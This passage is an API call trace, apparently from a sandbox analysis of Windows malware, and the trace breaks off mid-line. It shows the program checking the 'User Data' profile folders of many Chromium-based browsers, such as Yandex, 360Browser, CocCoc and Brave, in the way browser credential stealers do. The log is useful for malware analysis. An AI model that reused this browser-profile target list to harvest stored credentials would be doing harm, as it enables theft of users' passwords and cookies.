[0189.674] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.674] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data") returned 0x39 [0189.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.676] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x38 [0189.677] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.679] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.680] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\liebao\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data") returned 0x32 [0189.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.680] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x31 [0189.680] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.682] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.683] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data") returned 0x34 [0189.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.683] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x33 [0189.684] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.687] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.687] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data") returned 0x33 [0189.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.688] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x32 [0189.688] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.691] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.691] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data") returned 0x39 [0189.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.692] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x38 [0189.692] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.694] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.694] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data") returned 0x36 [0189.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.695] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", lpFilePart=0x0) returned 0x35 [0189.695] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.698] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.698] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Torch\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data") returned 0x31 [0189.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.699] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x30 [0189.699] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.702] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.702] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data") returned 0x40 [0189.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.702] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data", lpFilePart=0x0) returned 0x3f [0189.703] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.753] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.754] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data") returned 0x32 [0189.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.754] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data", lpFilePart=0x0) returned 0x31 [0189.754] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.757] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.757] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data") returned 0x3e [0189.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.758] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", lpFilePart=0x0) returned 0x3d [0189.758] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.760] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.760] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data") returned 0x34 [0189.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.761] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", lpFilePart=0x0) returned 0x33 [0189.761] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.764] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.764] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data") returned 0x33 [0189.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.764] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", lpFilePart=0x0) returned 0x32 [0189.765] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.767] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.767] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data") returned 0x3b [0189.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.767] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3a [0189.768] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.769] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.770] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data") returned 0x34 [0189.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.770] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", lpFilePart=0x0) returned 0x33 [0189.771] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.773] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.773] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data") returned 0x3a [0189.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.773] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x39 [0189.773] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.775] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.775] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Uran\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data") returned 0x30 [0189.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.776] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", lpFilePart=0x0) returned 0x2f [0189.776] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.779] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.779] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data") returned 0x34 [0189.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.779] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", lpFilePart=0x0) returned 0x33 [0189.780] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.781] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.781] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data") returned 0x38 [0189.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.782] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpFilePart=0x0) returned 0x37 [0189.782] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.784] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.784] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned 0x47 [0189.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.785] 